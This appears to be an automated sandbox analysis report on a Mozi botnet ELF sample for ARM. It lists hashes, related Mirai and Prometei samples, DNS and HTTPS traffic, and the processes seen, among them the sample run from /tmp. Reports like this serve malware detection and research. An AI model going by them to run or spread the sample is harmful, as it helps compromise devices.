                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  i.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                                  • 91.189.91.42
                                                                  sshd.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  No context
                                                                  No context
                                                                  No created / dropped files found
                                                                  File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 307920
                                                                  Entropy (8bit):6.027433742547694
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                  File name:Mozi.m.elf
                                                                  File size:285'420 bytes
                                                                  MD5:a418ef994dc1f9159012ea97c9d99834
                                                                  SHA1:aa6710a73df21e364d59785fc0d3f03b9783b880
                                                                  SHA256:caaff8c0f1d39424f4f3c55f5199bd709d78e343bc6050ed62d91bd6282df552
                                                                  SHA512:35b95d32def7303296b65454bd7cfdf59f9dc37f01a28f215a1b83a770a2d46c54f43052cac16ed1a652b6f9073ab76fd78b78f058b59f15e091ec71b2a6d840
                                                                  SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJg:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBU
                                                                  TLSH:17543A8AFD81AE25D5C1267BFE2F428A331317B8D2EB71129D145F2876CA94F0F3A541
                                                                  File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                  Download Network PCAP: filteredfull

                                                                  • Total Packets: 4
                                                                  • 443 (HTTPS)
                                                                  • 53 (DNS)
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 28, 2025 11:04:20.264374018 CET48202443192.168.2.13185.125.190.26
                                                                  Mar 28, 2025 11:04:51.748344898 CET48202443192.168.2.13185.125.190.26
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 28, 2025 11:04:10.302181005 CET3825953192.168.2.138.8.8.8
                                                                  Mar 28, 2025 11:04:10.302232027 CET5442053192.168.2.138.8.8.8
                                                                  Mar 28, 2025 11:04:10.390382051 CET53544208.8.8.8192.168.2.13
                                                                  Mar 28, 2025 11:04:10.390398979 CET53382598.8.8.8192.168.2.13
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Mar 28, 2025 11:04:10.302181005 CET192.168.2.138.8.8.80x3802Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                                  Mar 28, 2025 11:04:10.302232027 CET192.168.2.138.8.8.80xc2c5Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Mar 28, 2025 11:04:10.390398979 CET8.8.8.8192.168.2.130x3802No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                                  Mar 28, 2025 11:04:10.390398979 CET8.8.8.8192.168.2.130x3802No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                                                  System Behavior

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/cat
                                                                  Arguments:cat /tmp/tmp.23fD2FP8ru
                                                                  File size:43416 bytes
                                                                  MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/head
                                                                  Arguments:head -n 10
                                                                  File size:47480 bytes
                                                                  MD5 hash:fd96a67145172477dd57131396fc9608

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/tr
                                                                  Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                  File size:51544 bytes
                                                                  MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/cut
                                                                  Arguments:cut -c -80
                                                                  File size:47480 bytes
                                                                  MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/cat
                                                                  Arguments:cat /tmp/tmp.23fD2FP8ru
                                                                  File size:43416 bytes
                                                                  MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/head
                                                                  Arguments:head -n 10
                                                                  File size:47480 bytes
                                                                  MD5 hash:fd96a67145172477dd57131396fc9608

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/tr
                                                                  Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                                  File size:51544 bytes
                                                                  MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/cut
                                                                  Arguments:cut -c -80
                                                                  File size:47480 bytes
                                                                  MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):10:03:58
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -f /tmp/tmp.23fD2FP8ru /tmp/tmp.RgLKVlZJ0J /tmp/tmp.5lf3Du1i2X
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):10:04:08
                                                                  Start date (UTC):28/03/2025
                                                                  Path:/tmp/Mozi.m.elf
                                                                  Arguments:/tmp/Mozi.m.elf
                                                                  File size:4956856 bytes
                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1